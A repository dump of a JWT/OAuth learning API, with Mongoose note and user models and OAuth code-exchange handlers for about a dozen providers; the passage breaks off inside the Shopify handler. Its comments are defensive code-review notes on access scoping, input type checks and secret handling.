22 | -------------------------------------------------------------------------------- /local-remote-file-inclusion/rfi-lfi-payload-list/img/rfi-lfi.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/local-remote-file-inclusion/rfi-lfi-payload-list/img/rfi-lfi.jpeg -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/jsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "baseUrl": "src" 4 | }, 5 | "include": ["src"] 6 | } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/nodemon.json: -------------------------------------------------------------------------------- 1 | { 2 | "ignore": ["build/*", "node_modules/**/node_modules"] 3 | } 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "api", 3 | "version": "1.0.0", 4 | "private": true, 5 | "author": "Atul Yadav ", 6 | "scripts": { 7 | "seed": "babel-node src/setup/server/seeder.js", 8 | "setup": "npm install && npm run seed", 9 | "start": "nodemon src/index.js --exec babel-node", 10 | "start:prod": "npm run build:prod && npm run start:server", 11 | "build:prod": "babel src -s -D -d build", 12 | "start:server": "node build/index.js" 13 | }, 14 | "husky": { 15 | "hooks": { 16 | "pre-commit": "pretty-quick --staged" 17 | } 18 | }, 19 | "dependencies": { 20 | "axios": "^0.27.2", 21 | "bcrypt": "5.0.1", 22 | "body-parser": "1.20.0", 23 | "cors": "2.8.5", 24 | "dotenv": "16.0.1", 25 | "express": "4.18.1", 26 | 
"fullstack-validator": "^1.0.0", 27 | "ip": "1.1.8", 28 | "jsonwebtoken": "8.5.1", 29 | "lodash": "4.17.21", 30 | "moment": "^2.29.3", 31 | "mongoose": "6.3.3", 32 | "morgan": "1.10.0", 33 | "multer": "1.4.4" 34 | }, 35 | "devDependencies": { 36 | "@babel/cli": "7.17.10", 37 | "@babel/core": "7.17.12", 38 | "@babel/node": "7.17.10", 39 | "@babel/plugin-proposal-class-properties": "^7.17.12", 40 | "@babel/plugin-transform-runtime": "7.17.12", 41 | "@babel/preset-env": "7.17.12", 42 | "@babel/runtime": "7.17.9", 43 | "babel-plugin-module-resolver": "^4.1.0", 44 | "husky": "^4.3.6", 45 | "nodemon": "2.0.16", 46 | "prettier": "2.6.2", 47 | "pretty-quick": "^3.1.3" 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import express from 'express' 3 | 4 | // App Imports 5 | import { connect } from 'setup/server/database' 6 | import middlewares from 'setup/server/middlewares' 7 | import endpoint from 'setup/server/endpoint' 8 | import start from 'setup/server/start' 9 | 10 | // Create express server 11 | const server = express() 12 | 13 | // Connect database 14 | connect() 15 | 16 | // Setup middlewares 17 | middlewares(server) 18 | 19 | // Setup endpoint 20 | endpoint(server) 21 | 22 | // Start server 23 | start(server) 24 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/common/errors.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import params from 'setup/config/params' 3 | 4 | // Auth 5 | class AuthError extends Error { 6 | constructor(message) { 7 | super(message) 8 | 9 | this.code = params.common.errors.auth 10 | } 11 | } 12 | 13 | // Validation 14 | class ValidationError extends Error { 15 | 
constructor(message) { 16 | super(message) 17 | 18 | this.code = params.common.errors.validation 19 | } 20 | } 21 | 22 | export { AuthError, ValidationError } 23 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import query from './query' 3 | import mutation from './mutation' 4 | 5 | export default { 6 | ...query, 7 | ...mutation, 8 | } 9 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/model.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import mongoose, { Schema } from 'mongoose' 3 | 4 | // App imports 5 | import { collection as User } from 'modules/user/model' 6 | 7 | // Collection name 8 | export const collection = 'Note' 9 | 10 | // Schema 11 | const schema = new Schema( 12 | { 13 | userId: { 14 | type: Schema.Types.ObjectId, 15 | ref: User, 16 | required: true, 17 | index: true, 18 | }, 19 | 20 | text: { 21 | type: String, 22 | required: true, 23 | }, 24 | 25 | isDeleted: { 26 | type: Boolean, 27 | required: true, 28 | default: false, 29 | index: true, 30 | }, 31 | }, 32 | { timestamps: true }, 33 | ) 34 | 35 | // Model 36 | export default mongoose.model(collection, schema, collection) 37 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import noteSave from './save' 3 | import noteRemove from './remove' 4 | 5 | // Mutations 6 | export default { 7 | noteSave, 8 | noteRemove, 9 | } 10 | 
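--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/remove.js:
--------------------------------------------------------------------------------
// App imports
import { authCheck } from 'setup/helpers/utils'
import v from 'setup/helpers/validation'
import { AuthError, ValidationError } from 'modules/common/errors'
import Note from 'modules/note/model'

/**
 * Remove (soft-delete) one of the caller's notes.
 *
 * @param {object} args
 * @param {object} args.params - request params; `noteId` identifies the note
 * @param {object} args.auth - auth context populated by the authentication middleware
 * @returns {Promise<{data: object, message: string}>} the updateOne result and a status message
 * @throws {AuthError} when the caller is not authenticated
 * @throws {ValidationError} when `noteId` is missing, empty or not a string
 * @throws {Error} when the database update fails
 */
export default async function remove({ params: { noteId }, auth }) {
  if (!authCheck(auth)) {
    throw new AuthError('You are not authorized to perform this action.')
  }

  // Only a plain string id is accepted. An object here would reach the query
  // filter as-is and could carry query operators instead of an id.
  if (typeof noteId !== 'string') {
    throw new ValidationError('Invalid note.')
  }

  // Validation rules
  const rules = [
    {
      data: { value: noteId },
      check: 'isNotEmpty',
      message: 'Invalid note.',
    },
  ]

  // Validate
  try {
    v.validate(rules)
  } catch (error) {
    throw new ValidationError(error.message)
  }

  try {
    // Note: the filter is scoped to the caller's own notes. Matching on `_id`
    // alone let any authenticated user soft-delete any note whose id they
    // knew (insecure direct object reference).
    const data = await Note.updateOne(
      { _id: noteId, userId: auth.user._id },
      { $set: { isDeleted: true } },
    )

    // `data` is mongoose's write result; a note that is not the caller's
    // simply matches nothing, and the message below is still returned.
    return {
      data,
      message: `Note has been removed successfully.`,
    }
  } catch (error) {
    throw new Error(`An error occurred. ${error.message}`)
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/mutation/save.js:
--------------------------------------------------------------------------------
// App imports
import params from 'setup/config/params'
import { authCheck } from 'setup/helpers/utils'
import v from 'setup/helpers/validation'
import { AuthError, ValidationError } from 'modules/common/errors'
import Note from 'modules/note/model'

/**
 * Save a new note for the caller.
 *
 * @param {object} args
 * @param {object} args.params - request params; `text` is the note body
 * @param {object} args.auth - auth context populated by the authentication middleware
 * @returns {Promise<{data: object, message: string}>} the created document and a status message
 * @throws {AuthError} when the caller is not authenticated
 * @throws {ValidationError} when `text` is empty
 * @throws {Error} when the insert fails
 */
export default async function save({ params: { text }, auth }) {
  if (!authCheck(auth)) {
    throw new AuthError('You are not authorized to perform this action.')
  }

  // Validate
  try {
    v.validate([
      {
        data: { value: text },
        check: 'isNotEmpty',
        message: 'Invalid text.',
      },
    ])
  } catch (error) {
    throw new ValidationError(error.message)
  }

  try {
    // The owner is always taken from the verified auth context, never from
    // the request params, so a note cannot be written under another user.
    const data = await Note.create({
      userId: auth.user._id,
      text,
      isDeleted: false,
    })

    return {
      data,
      message: `Note has been saved successfully.`,
    }
  } catch (error) {
    throw new Error(`An error occurred. ${error.message}`)
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/query/index.js:
--------------------------------------------------------------------------------
// App imports
import noteList from './list'

// Queries exposed by the note module
const queries = {
  noteList,
}

export default queries
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/note/query/list.js:
--------------------------------------------------------------------------------
// App imports
import { authCheck } from 'setup/helpers/utils'
import { AuthError } from 'modules/common/errors'
import Note from 'modules/note/model'

/**
 * List the caller's notes that are not soft-deleted, newest first.
 *
 * @param {object} args
 * @param {object} args.auth - auth context populated by the authentication middleware
 * @returns {Promise<{data: object[]}>} the matching note documents
 * @throws {AuthError} when the caller is not authenticated
 * @throws {Error} when the query fails
 */
export default async function list({ auth }) {
  if (!authCheck(auth)) {
    throw new AuthError('You are not authorized to perform this action.')
  }

  try {
    // Note: scoped to the caller and filtered on the soft-delete flag
    const data = await Note.find({
      userId: auth.user._id,
      isDeleted: false,
    }).sort({ createdAt: -1 })

    return {
      data,
    }
  } catch (error) {
    throw new Error(`An error occurred. ${error.message}`)
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/index.js:
--------------------------------------------------------------------------------
// App Imports
import query from './query'
import mutation from './mutation'

// User module: one flat map of operation name -> handler
const user = {
  ...query,
  ...mutation,
}

export default user
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/model.js:
--------------------------------------------------------------------------------
// Imports
import mongoose, { Schema } from 'mongoose'

// Collection name
export const collection = 'User'

// Fields
const fields = {
  // Every provider handler on this page resolves a login to an `email`;
  // presumably this unique field is what links a provider login to an
  // existing user (the authorize handler that consumes it is not shown).
  email: {
    type: String,
    required: true,
    unique: true,
    index: true,
  },

  // NOTE(review): required although every login flow shown here is OAuth.
  // Whatever is stored here comes back from User queries unless the caller
  // projects it out (userAuthResponse deletes it before responding).
  password: {
    type: String,
    required: true,
  },

  name: {
    type: String,
    required: true,
  },
}

// Schema (createdAt / updatedAt are maintained by mongoose via `timestamps`)
const schema = new Schema(fields, { timestamps: true })

// Model
export default mongoose.model(collection, schema, collection)
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/azure.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_AZURE_ID,
  OAUTH_AZURE_SECRET,
  OAUTH_AZURE_TENANT,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Azure (Microsoft identity platform) OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function azure({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  const form = new URLSearchParams()
  form.append('client_id', OAUTH_AZURE_ID)
  form.append('client_secret', OAUTH_AZURE_SECRET)
  // must match the redirect_uri the web client used to start the flow
  form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`)
  form.append('grant_type', `authorization_code`)
  form.append(
    'scope',
    [
      'offline_access',
      'openid',
      'email',
      'profile',
      'https://graph.microsoft.com/user.read',
    ].join(' '),
  )
  form.append('code', code)

  const { data: token } = await axios({
    url: `https://login.microsoftonline.com/${OAUTH_AZURE_TENANT}/oauth2/v2.0/token`,
    method: 'post',
    data: form,
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://graph.microsoft.com/v1.0/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        // NOTE(review): userPrincipalName is used as the account email;
        // confirm it is a mailbox address for every tenant you accept.
        email: me.userPrincipalName,
        name: me.displayName,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/bitbucket.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_BITBUCKET_ID, OAUTH_BITBUCKET_SECRET } from 'setup/config/env'

/**
 * Bitbucket OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token, no user or no email list came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function bitbucket({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (client credentials go in HTTP Basic auth, not in the form body)
  const form = new URLSearchParams()
  form.append('grant_type', 'authorization_code')
  form.append('code', code)

  const { data: token } = await axios({
    url: 'https://bitbucket.org/site/oauth2/access_token',
    method: 'post',
    data: form,
    auth: {
      username: OAUTH_BITBUCKET_ID,
      password: OAUTH_BITBUCKET_SECRET,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.bitbucket.org/2.0/user',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me) {
      // 3. get user emails
      const { data: emails } = await axios({
        url: 'https://api.bitbucket.org/2.0/user/emails',
        method: 'get',
        headers: {
          'content-type': 'application/json',
          Authorization: `Bearer ${token.access_token}`,
        },
      })

      // The first listed address is used. The list is checked before it is
      // indexed; an empty list used to throw a TypeError here.
      // NOTE(review): this endpoint lists every address on the account;
      // confirm the chosen one is the primary, confirmed one before it
      // becomes the account key.
      if (emails && Array.isArray(emails.values) && emails.values.length > 0) {
        userProvider = {
          email: emails.values[0].email,
          name: me.display_name,
        }
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/digitalocean.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_DIGITALOCEAN_ID,
  OAUTH_DIGITALOCEAN_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * DigitalOcean OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no account came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function digitalocean({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    NOTE(review): the token-request fields, client_secret included, are
  //    sent as query parameters and so can land in URL logs on the way;
  //    prefer the request body if the provider accepts it.
  const { data: token } = await axios({
    url: 'https://cloud.digitalocean.com/v1/oauth/token',
    method: 'post',
    headers: { accept: 'application/json' },
    params: {
      client_id: OAUTH_DIGITALOCEAN_ID,
      client_secret: OAUTH_DIGITALOCEAN_SECRET,
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: 'authorization_code',
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.digitalocean.com/v2/account',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.account) {
      userProvider = {
        email: me.account.email,
        // the display name comes from the token response's `info` object,
        // not from the account endpoint
        name: token.info.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/discord.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_DISCORD_ID,
  OAUTH_DISCORD_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Discord OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function discord({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  const form = new URLSearchParams()
  form.append('client_id', OAUTH_DISCORD_ID)
  form.append('client_secret', OAUTH_DISCORD_SECRET)
  form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`)
  form.append('grant_type', `authorization_code`)
  form.append('scope', `identify email`)
  form.append('code', code)

  const { data: token } = await axios({
    url: 'https://discordapp.com/api/oauth2/token',
    method: 'post',
    data: form,
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://discordapp.com/api/users/@me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: me.username,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/facebook.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_FACEBOOK_ID,
  OAUTH_FACEBOOK_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Facebook OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function facebook({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (a GET; client_secret travels in the query string, see the note in
  //    digitalocean.js)
  const { data: token } = await axios({
    url: 'https://graph.facebook.com/v6.0/oauth/access_token',
    method: 'get',
    params: {
      client_id: OAUTH_FACEBOOK_ID,
      client_secret: OAUTH_FACEBOOK_SECRET,
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://graph.facebook.com/me',
      method: 'get',
      // access_token is sent as a query parameter rather than a header, so
      // it can appear in URL logs of anything between this server and Graph
      params: {
        fields: ['id', 'email', 'name'].join(','),
        access_token: token.access_token,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: me.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/github.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_GITHUB_ID, OAUTH_GITHUB_SECRET, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * GitHub OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string|null, name: string}|undefined>} provider
 *   profile, or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function github({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (`accept: application/json` asks for a JSON body instead of the
  //    form-encoded default; client_secret travels in the query string, see
  //    the note in digitalocean.js)
  const { data: token } = await axios({
    url: 'https://github.com/login/oauth/access_token',
    method: 'get',
    headers: { accept: 'application/json' },
    params: {
      client_id: OAUTH_GITHUB_ID,
      client_secret: OAUTH_GITHUB_SECRET,
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.github.com/user',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        // GitHub uses the `token` scheme rather than `Bearer`
        Authorization: `token ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        // NOTE(review): this is the public profile email and is null when
        // the user keeps it private; confirm how the caller handles a null
        // email before it reaches the User model, where email is required.
        email: me.email,
        name: me.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/gitlab.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_GITLAB_ID, OAUTH_GITLAB_SECRET, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * GitLab OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function gitlab({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (client_secret travels in the query string, see the note in
  //    digitalocean.js)
  const { data: token } = await axios({
    url: `https://gitlab.com/oauth/token`,
    method: 'post',
    params: {
      client_id: OAUTH_GITLAB_ID,
      client_secret: OAUTH_GITLAB_SECRET,
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: 'authorization_code',
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://gitlab.com/api/v4/user',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: me.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/google.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_GOOGLE_ID, OAUTH_GOOGLE_SECRET, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Google OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function google({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (the token request is sent as a JSON body)
  const { data: token } = await axios({
    url: `https://oauth2.googleapis.com/token`,
    method: 'post',
    data: {
      client_id: OAUTH_GOOGLE_ID,
      client_secret: OAUTH_GOOGLE_SECRET,
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: 'authorization_code',
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://www.googleapis.com/oauth2/v2/userinfo',
      method: 'get',
      headers: {
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: me.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/instagram.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_INSTAGRAM_ID,
  OAUTH_INSTAGRAM_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Instagram OAuth 2.0 code exchange (short-lived token, then long-lived).
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile
 *   (with a synthesized email), or undefined when any step returned no token
 *   or no profile id
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function instagram({ code }) {
  let userProvider

  // 1. get a (short lived) access_token for the OAuth code
  const form = new URLSearchParams()
  form.append('client_id', OAUTH_INSTAGRAM_ID)
  form.append('client_secret', OAUTH_INSTAGRAM_SECRET)
  // form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`) // live
  // NOTE(review): redirect_uri is hard-coded to example.com (marked "test")
  // and the live line above is commented out. Providers normally reject the
  // exchange unless this matches the registered redirect URI, so this is a
  // deployment switch, not a cosmetic leftover.
  form.append(
    'redirect_uri',
    `https://example.com/${params.user.oauth.redirectUri}`,
  ) // test
  form.append('grant_type', `authorization_code`)
  form.append('code', code)

  const { data: shortLived } = await axios({
    url: 'https://api.instagram.com/oauth/access_token',
    method: 'post',
    data: form,
  })

  // 2. exchange it for a (long lived) access_token
  if (shortLived && shortLived.access_token) {
    const { data: longLived } = await axios({
      url: 'https://graph.instagram.com/access_token',
      method: 'get',
      params: {
        grant_type: 'ig_exchange_token',
        client_secret: OAUTH_INSTAGRAM_SECRET,
        access_token: shortLived.access_token,
      },
    })

    // 3. get user details (guarded: the long-lived token used to be sent on
    //    without checking that the exchange returned one)
    if (longLived && longLived.access_token) {
      const { data: me } = await axios({
        url: 'https://graph.instagram.com/me',
        method: 'get',
        // client_secret and access_token travel in the query string here
        params: {
          fields: ['id', 'username', 'account_type', 'media_count'].join(','),
          client_secret: OAUTH_INSTAGRAM_SECRET,
          access_token: longLived.access_token,
        },
      })

      if (me && me.id) {
        userProvider = {
          // NOTE(review): synthesized address. If accounts are keyed on
          // email (the consuming authorize handler is not shown), make sure
          // it cannot collide with an address asserted by another provider.
          email: `${me.username}@instagram.com`, // Instagram does not return `email` field
          name: me.username,
        }
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/linkedin.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_LINKEDIN_ID,
  OAUTH_LINKEDIN_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * LinkedIn OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token, no profile or no email handle came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function linkedin({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  const form = new URLSearchParams()
  form.append('client_id', OAUTH_LINKEDIN_ID)
  form.append('client_secret', OAUTH_LINKEDIN_SECRET)
  form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`)
  form.append('grant_type', `authorization_code`)
  form.append('code', code)

  const { data: token } = await axios({
    url: `https://www.linkedin.com/oauth/v2/accessToken`,
    method: 'post',
    data: form,
  })

  // 2. get user details (profile and email come from separate endpoints)
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.linkedin.com/v2/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    const { data: meEmail } = await axios({
      url:
        'https://api.linkedin.com/v2/clientAwareMemberHandles?q=members&projection=(elements*(primary,type,handle~))',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    // The first handle is used. The list is checked before it is indexed;
    // an empty `elements` used to throw a TypeError here.
    const handles =
      meEmail && Array.isArray(meEmail.elements) ? meEmail.elements : []
    const firstHandle = handles.length > 0 ? handles[0]['handle~'] : undefined

    if (me && firstHandle) {
      userProvider = {
        email: firstHandle.emailAddress,
        name: `${me.localizedFirstName} ${me.localizedLastName}`,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/reddit.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_REDDIT_ID, OAUTH_REDDIT_SECRET, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Reddit OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile
 *   (with a synthesized email), or undefined when no access_token or no
 *   username came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function reddit({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (client credentials go in HTTP Basic auth; the rest as query params)
  const { data: token } = await axios({
    url: 'https://www.reddit.com/api/v1/access_token',
    method: 'post',
    headers: { accept: 'application/json' },
    auth: {
      username: OAUTH_REDDIT_ID,
      password: OAUTH_REDDIT_SECRET,
    },
    params: {
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: 'authorization_code',
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://oauth.reddit.com/api/v1/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        // lower-case scheme, kept as the provider integration expects it
        Authorization: `bearer ${token.access_token}`,
      },
    })

    if (me && me.name) {
      userProvider = {
        // NOTE(review): synthesized address. If accounts are keyed on email
        // (the consuming authorize handler is not shown), make sure it
        // cannot collide with an address asserted by another provider.
        email: `${me.name}@reddit.com`, // Reddit does not return `email` field
        name: me.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/shopify.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_SHOPIFY_ID,
  OAUTH_SHOPIFY_SECRET,
  OAUTH_SHOPIFY_STORE,
} from 'setup/config/env'

/**
 * Shopify OAuth 2.0 code exchange for one configured store.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} the store's
 *   email and name, or undefined when no access_token or no shop came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function shopify({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (no redirect_uri is sent; client_secret travels in the query string,
  //    see the note in digitalocean.js)
  const { data: token } = await axios({
    url: `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/oauth/access_token`,
    method: 'post',
    params: {
      client_id: OAUTH_SHOPIFY_ID,
      client_secret: OAUTH_SHOPIFY_SECRET,
      code,
    },
  })

  // 2. get store details
  if (token && token.access_token) {
    const { data: store } = await axios({
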